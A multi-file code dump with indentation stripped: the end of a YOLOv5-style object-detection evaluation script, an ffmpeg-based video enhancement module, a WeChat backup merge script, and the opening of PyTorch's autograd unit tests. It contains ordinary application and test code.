print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb_logger and wandb_logger.wandb:
val_batches = [wandb_logger.wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb_logger.log({"Validation": val_batches})
if wandb_images:
wandb_logger.log({"Bounding Box Debugger/Images": wandb_images})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ('train', 'val', 'test'): # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
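# Example invocations (illustrative; the weight and dataset paths are assumptions):
#   python test.py --weights yolov5s.pt --data data/coco128.yaml --img-size 640
#   python test.py --task speed --weights yolov5s.pt yolov5m.pt --data data/coco.yaml
#   python test.py --task study --iou-thres 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt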
|
video.py
|
import os
import subprocess as sp
import re
import sys
import threading
import logging
import signal
from math import ceil
from queue import Queue, Empty
from gevent import idle
from config import config
from imageProcess import clean
from procedure import genProcess
from progress import Node, initialETA
from worker import context, begin
from runSlomo import RefTime as SlomoRefs
from videoSR import RefTime as VSRRefs
from ESTRNN import para as ESTRNNpara
log = logging.getLogger('Moe')
ffmpegPath = os.path.realpath('ffmpeg/bin/ffmpeg') # require full path to spawn in shell
qOut = Queue(256)
stepVideo = [dict(op='buffer', bitDepth=16)]
pix_fmt = 'bgr48le'
pixBytes = 6
bufsize = 10 ** 8
isWindows = sys.platform[:3] == 'win'
reMatchInfo = re.compile(r'Stream #.*: Video:')
reSearchInfo = re.compile(r',[\s]*([\d]+)x([\d]+)[\s]*.+,[\s]*([.\d]+)[\s]*(fps|tbr)')
reMatchFrame = re.compile(r'frame=')
reSearchFrame = re.compile(r'frame=[\s]*([\d]+) ')
reMatchAudio = re.compile(r'Stream #0:1')
reMatchOutput = re.compile(r'Output #0,')
formats = {'.mp4', '.ts', '.mkv'}
creationflag = sp.CREATE_NEW_PROCESS_GROUP if isWindows else 0
sigint = signal.CTRL_BREAK_EVENT if isWindows else signal.SIGINT
lookback = dict(slomo=SlomoRefs >> 1, VSR=VSRRefs >> 1, demob=ESTRNNpara.past_frames)
lookahead = dict(slomo=(SlomoRefs - 1) >> 1, VSR=(VSRRefs - 1) >> 1, demob=ESTRNNpara.future_frames)
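# For the window-based models (slomo, VSR) with N reference frames, N >> 1 frames fall before
# the current frame and (N - 1) >> 1 after it, while ESTRNN (demob) supplies its past/future
# frame counts directly; prepare() uses these tables to pull extra frames ahead of the start
# point and SR_vid() uses them to pad the tail of the stream.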
resizeOp = {'SR', 'resize', 'VSR'}
padOp = {'VSR', 'demob'}
popen = lambda command: sp.Popen(command, stdout=sp.PIPE, stderr=sp.PIPE, bufsize=bufsize, creationflags=creationflag)
popenText = lambda command: sp.Popen(command, stderr=sp.PIPE, encoding='utf_8', errors='ignore')
insert1 = lambda t, s: ''.join((t[0], s, *t[1:]))
splitext = lambda p: os.path.splitext(p)
fixExt = lambda t: ''.join((*t[:-1], t[-1] if t[-1] in formats else '.mkv'))
suffix = lambda p, s: insert1(splitext(p), s)
clipList = lambda l, start, end: l[:start] + l[end:]
commandVideoSkip = lambda command: clipList(command, 15, 25)
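# clipList drops list elements [start, end); commandVideoSkip strips elements 15-24 of
# commandVideo (the second '-i' input plus its '-map' selections and '-c:1 copy'), leaving
# an encoder command that writes only the processed video stream.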
def removeFile(path):
try:
os.remove(path)
except FileNotFoundError: pass
except PermissionError as e:
log.error(str(e))
def getVideoInfo(videoPath, by, width, height, frameRate):
commandIn = [
ffmpegPath,
'-hide_banner',
'-t', '1',
'-f', 'lavfi',
'-i', videoPath,
'-map', '0:v:0',
'-c', 'copy',
'-f', 'null',
'-'
]
matchInfo = not (width and height and frameRate)
matchFrame = not by
matchOutput = True
error = RuntimeError('Video info not found')
videoOnly = True
if by != 'cmd':
commandIn = clipList(commandIn, 4, 6)
if matchFrame:
commandIn = clipList(commandIn, 2, 4)
# start the probe process before the try block so the finally clause
# never references procIn when popenText itself fails
procIn = popenText(commandIn)
totalFrames = 0
try:
while matchInfo or matchOutput or matchFrame:
line = procIn.stderr.readline()
if not isinstance(line, str):
line = str(line, 'utf-8', errors='ignore')
sys.stdout.write(line)
if not line:
break
line = line.lstrip()
if reMatchOutput.match(line):
matchOutput = False
elif reMatchAudio.match(line):
videoOnly = False
if matchInfo and reMatchInfo.match(line):
try:
videoInfo = reSearchInfo.search(line).groups()
if not width:
width = int(videoInfo[0])
if not height:
height = int(videoInfo[1])
if not frameRate:
frameRate = float(videoInfo[2])
except Exception:
log.error(line)
raise error
matchInfo = False
if matchFrame and reMatchFrame.match(line):
try:
totalFrames = int(reSearchFrame.search(line).groups()[0])
except Exception:
log.error(line)
procIn.stderr.flush()
procIn.stderr.close()
finally:
procIn.terminate()
if matchInfo or (matchFrame and not totalFrames):
raise error
log.info('Info of video {}: {}x{}@{}fps, {} frames'.format(videoPath, width, height, frameRate, totalFrames))
return width, height, frameRate, totalFrames, videoOnly
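# Illustrative only: the kind of ffmpeg stderr line the patterns above are meant to parse.
# The sample text is an assumption about typical ffmpeg output, not captured from this tool.
def _parse_info_example():
    sample = 'Stream #0:0: Video: h264 (High), yuv420p, 1920x1080 [SAR 1:1 DAR 16:9], 23.98 fps'
    assert reMatchInfo.match(sample)
    width, height, rate, unit = reSearchInfo.search(sample).groups()
    return int(width), int(height), float(rate), unit  # (1920, 1080, 23.98, 'fps')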
def enqueueOutput(out, queue):
try:
for line in iter(out.readline, b''):
queue.put(line)
out.flush()
except Exception: pass
def createEnqueueThread(pipe, *args):
t = threading.Thread(target=enqueueOutput, args=(pipe, qOut, *args))
t.daemon = True # thread dies with the program
t.start()
def readSubprocess(q):
while True:
try:
line = q.get_nowait()
if not isinstance(line, str):
line = str(line, encoding='utf_8', errors='replace')
except Empty:
break
else:
sys.stdout.write(line)
def prepare(video, by, steps):
optEncode = steps[-1]
encodec = optEncode.get('codec', config.defaultEncodec) # pylint: disable=E1101
optDecode = steps[0]
decodec = optDecode.get('codec', config.defaultDecodec) # pylint: disable=E1101
optRange = steps[1]
start = int(optRange.get('start', 0))
outDir = config.outDir # pylint: disable=E1101
procSteps = stepVideo + list(steps[2:-1])
diagnose = optEncode.get('diagnose', {})
bench = diagnose.get('bench', False)
clear = diagnose.get('clear', False)
process, nodes = genProcess(procSteps)
traceDetail = config.progressDetail or bench # pylint: disable=E1101
root = begin(Node({'op': 'video'}, 1, 2, 0), nodes, traceDetail, bench, clear)
context.root = root
slomos = [step for step in procSteps if step['op'] == 'slomo']
refs, ahead = 0, 0
if start < 0:
start = 0
for i in range(len(procSteps) - 1, -1, -1): # gather some reference frames before start point for video models
step = procSteps[i]
if step['op'] == 'slomo':
step['opt'].outStart = -refs % step['sf'] if refs else 1
step['opt'].outEnd = -(-ahead % step['sf'])
refs = max(ceil(refs / step['sf']), lookback[step['op']])
ahead = max(ceil(ahead / step['sf']), lookahead[step['op']])
elif step['op'] in padOp:
step['opt'].start = 0
step['opt'].end = 0
refs += lookback[step['op']]
ahead += lookahead[step['op']]
if start < refs: # no enough reference frames
arefs = start
for step in procSteps:
if arefs >= refs:
break
if step['op'] == 'slomo':
refs = refs * step['sf'] - step['opt'].outStart
step['opt'].outStart = 0
arefs = arefs * step['sf']
elif step['op'] in padOp:
step['opt'].start = min(refs - arefs, lookback[step['op']])
refs -= step['opt'].start
start = 0
else:
start -= refs
stop = int(optRange.get('stop', -1))
if stop <= start:
stop = -1
root.total = -1 if stop < 0 else stop - start
outputPath = fixExt(splitext(optEncode.get('file', '') or outDir + '/' + config.getPath()))
dataPath = suffix(outputPath, '-a')
commandIn = [
ffmpegPath,
'-hide_banner',
'-f', 'lavfi',
'-i', video,
'-vn',
'-c', 'copy',
'-y',
dataPath,
'-map', '0:v',
'-f', 'rawvideo',
'-pix_fmt', pix_fmt]
if by != 'cmd':
commandIn = clipList(commandIn, 2, 4)
if len(decodec):
commandIn.extend(decodec.split(' '))
commandIn.append('-')
metadata = ['-metadata', 'service_provider="MoePhoto {}"'.format(config.version)] # pylint: disable=E1101
commandVideo = [
ffmpegPath,
'-hide_banner', '-y',
'-f', 'rawvideo',
'-pix_fmt', pix_fmt,
'-s', '',
'-r', '',
'-thread_queue_size', '64',
'-i', '-',
'-i', dataPath,
'-map', '0:v',
'-map', '1?',
'-map', '-1:v',
'-c:1', 'copy',
*metadata,
'-c:v:0'
] + encodec.split(' ') + ['']
commandOut = None
if by:
commandVideo[-1] = suffix(outputPath, '-v')
commandOut = [
ffmpegPath,
'-hide_banner', '-y',
'-i', commandVideo[-1],
'-i', dataPath,
'-map', '0:v',
'-map', '1?',
'-c:0', 'copy',
'-c:1', 'copy',
*metadata,
outputPath
]
else:
commandVideo[16] = video
frameRate = optEncode.get('frameRate', 0)
width = optDecode.get('width', 0)
height = optDecode.get('height', 0)
sizes = [step for step in procSteps if step['op'] in resizeOp]
return outputPath, process, start, stop, ahead, root, commandIn, commandVideo, commandOut, slomos, sizes, width, height, frameRate
def setupInfo(by, outputPath, root, commandIn, commandVideo, commandOut, slomos, sizes, start, width, height, frameRate, totalFrames, videoOnly):
if root.total < 0 and totalFrames > 0:
root.total = totalFrames - start
if frameRate:
for opt in slomos:
frameRate *= opt['sf']
outWidth, outHeight = (width, height)
for opt in sizes:
if opt['op'] == 'SR':
outWidth *= opt['scale']
outHeight *= opt['scale']
elif opt['op'] == 'VSR':
outWidth *= 4
outHeight *= 4
else: # resize
outWidth = round(outWidth * opt['scaleW']) if 'scaleW' in opt else opt['width']
outHeight = round(outHeight * opt['scaleH']) if 'scaleH' in opt else opt['height']
commandVideo[8] = f'{outWidth}x{outHeight}'
commandVideo[10] = str(frameRate)
videoOnly |= start > 0
if videoOnly or by:
commandVideo = commandVideoSkip(commandVideo)
if videoOnly or not by:
commandVideo[-1] = outputPath
i = commandIn.index('-vn')
commandIn = clipList(commandIn, i, i + 5)
commandOut = None
root.multipleLoad(width * height * 3)
initialETA(root)
root.reset().trace(0)
return commandIn, commandVideo, commandOut
def cleanAV(command, path):
if command:
try:
stat = os.stat(path)
except Exception:
stat = False
removeFile(command[6])
video = command[4]
if stat:
removeFile(video)
else:
return video
return path
def mergeAV(command):
if command:
err = True
procMerge = popenText(command)
createEnqueueThread(procMerge.stderr)
err, msg = procMerge.communicate()
sys.stdout.write(msg)
return procMerge, err
else:
return 0, 0
def SR_vid(video, by, *steps):
def p(raw_image=None):
bufs = process((raw_image, height, width))
if bufs is not None and len(bufs):
for buffer in bufs:
if buffer:
procOut.stdin.write(buffer)
if raw_image:
root.trace()
return 0 if bufs is None else len(bufs)
context.stopFlag.clear()
outputPath, process, *args = prepare(video, by, steps)
start, stop, refs, root = args[:4]
width, height, *more = getVideoInfo(video, by, *args[-3:])
root.callback(root, dict(shape=[height, width], fps=more[0]))
commandIn, commandVideo, commandOut = setupInfo(by, outputPath, *args[3:9], start, width, height, *more)
procIn = popen(commandIn)
procOut = sp.Popen(commandVideo, stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE, bufsize=0)
procMerge = 0
err = 0
try:
createEnqueueThread(procOut.stdout)
createEnqueueThread(procIn.stderr)
createEnqueueThread(procOut.stderr)
i = 0
raw_image = b''  # ensure defined even if the read loop exits immediately
frameBytes = width * height * pixBytes # read 1 frame
while (stop < 0 or i <= stop + refs) and not context.stopFlag.is_set():
raw_image = procIn.stdout.read(frameBytes)
if len(raw_image) == 0:
break
readSubprocess(qOut)
if i >= start:
p(raw_image)
elif (i + 1) % 10 == 0:
root.callback(root, dict(skip=i + 1))
i += 1
idle()
os.kill(procIn.pid, sigint)
if len(raw_image) == 0: # tell VSR to pad frames
arefs = 0 if stop <= 0 or i < stop else i - stop
for step in steps:
if arefs >= refs:
break
if step['op'] == 'slomo':
refs = refs * step['sf'] + step['opt'].outEnd # outEnd is negative
step['opt'].outEnd = 0
arefs = arefs * step['sf']
elif step['op'] in padOp:
step['opt'].end = -min(refs - arefs, lookahead[step['op']])
refs += step['opt'].end
p()
procOut.communicate(timeout=300)
procIn.terminate()
readSubprocess(qOut)
procMerge, err = mergeAV(commandOut)
finally:
log.info('Video processing end at frame #{}.'.format(i - refs))
procIn.terminate()
procOut.terminate()
if procMerge:
procMerge.terminate()
clean()
try:
if not by:
removeFile(video)
except Exception:
log.warning('Timed out waiting ffmpeg to terminate, need to remove {} manually.'.format(video))
if err:
log.warning('Unable to merge video and other tracks with exit code {}.'.format(err))
else:
outputPath = cleanAV(commandOut, outputPath)
readSubprocess(qOut)
return outputPath, i - refs
|
merge_wechat_backup.py
|
#!/usr/bin/python -u
"""
Copyright 2017, Jacksgong(https://blog.dreamtobe.cn)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Script to merge and migrate wechat backup on mac.
# Some case like you can merge and migrate wechat backup files to the Dropbox auto-backup folder to make it on cloud.
import sys
import time
import filecmp
import re
from os import walk, makedirs, remove, environ
from os.path import join, exists, getsize
from shutil import copyfile
from threading import Thread
#from wechat_backup_utils import colorize, YELLOW, RED, GREEN, BLACK, handle_home_case, select_conf_file, show_spinner
from wechat_backup_utils import handle_home_case, select_conf_file, show_spinner
__version__ = '1.0.0'
def replace_file(src_path, dst_path, name):
# print ('replace the file: ' + name, fg=YELLOW)
print ('replace the file: ' + name)
remove(dst_path)
copyfile(src_path, dst_path)
def merge():
if not exists(dst_file_path):
if not exists(dst_subdir):
makedirs(dst_subdir)
copyfile(src_file_path, dst_file_path)
# print('copy the new file: ' + file_name, fg=RED)
print('copy the new file: ' + file_name)
else:
# compare the file size
src_file_size = getsize(src_file_path)
dst_file_size = getsize(dst_file_path)
if src_file_size != dst_file_size:
replace_file(src_file_path, dst_file_path, file_name)
else:
# compare the file
if not filecmp.cmp(src_file_path, dst_file_path):
replace_file(src_file_path, dst_file_path, file_name)
else:
print('no need to replace ' + file_name)
#print('no need to replace ' + file_name, fg=GREEN)
src, dst, conf_path = select_conf_file()
if src is None or dst is None:
exit("we can't find source directory or target directory on " + conf_path)
RELATE_DIR = re.compile(re.escape(src) + '/(.*)')
for src_subdir, dirs, files in walk(src):
for file_name in files:
if file_name == '.DS_Store':
continue
if src_subdir == src:
continue
relate_dir = RELATE_DIR.match(src_subdir).groups()[0]
dst_subdir = dst + '/' + relate_dir
src_file_path = join(src_subdir, file_name)
dst_file_path = join(dst_subdir, file_name)
print('compare ' + file_name + ' on ' + relate_dir)
thread = Thread(target=merge)
thread.start()
show_spinner(thread)
print('everything is done!')
|
test_autograd.py
|
import gc
import sys
import io
import math
import random
import tempfile
import time
import threading
import unittest
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, format_time, EventList,
FunctionEvent, FunctionEventAvg,
record_function, emit_nvtx)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing import randn_like
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
import pickle
PRECISION = 1e-4
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
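# graph_desc renders a grad_fn node and its next_functions recursively; the strings asserted
# in test_once_differentiable below, e.g. 'CopyBackwards(None, Error(AccumulateGrad(), None,
# AccumulateGrad()))', show the resulting format.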
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure grad(grad)check runs successfully even if there is an
# unrelated (but differentiable) inputs
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
mat = torch.randn(2, 3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.mv, choose a different op
res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
